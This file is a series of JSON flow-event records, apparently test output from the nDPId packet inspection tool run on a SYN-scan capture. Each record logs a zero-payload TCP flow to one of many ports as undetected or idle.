+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8089,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":846,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8090,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":846,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8090,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":901,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8090,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":901,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8090,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1474,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060697,"flow_last_seen":1278275060697,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1947,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1474,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060697,"flow_last_seen":1278275060697,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1947,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":691,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3995,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":691,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3995,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1575,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060802,"flow_last_seen":1278275060802,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1947,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1575,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060802,"flow_last_seen":1278275060802,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1947,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":756,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3995,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":756,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3995,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1890,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8093,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1890,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8093,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1962,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8093,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1962,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8093,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1692,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3998,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1692,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":14238,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":14238,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1371,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":51103,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1371,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":51103,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1765,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3998,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1765,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":14238,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":14238,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1448,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":51103,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1448,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":51103,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1842,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1842,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1919,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1919,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1484,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1484,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1565,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1565,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":634,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8099,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":634,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":703,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8099,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":703,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 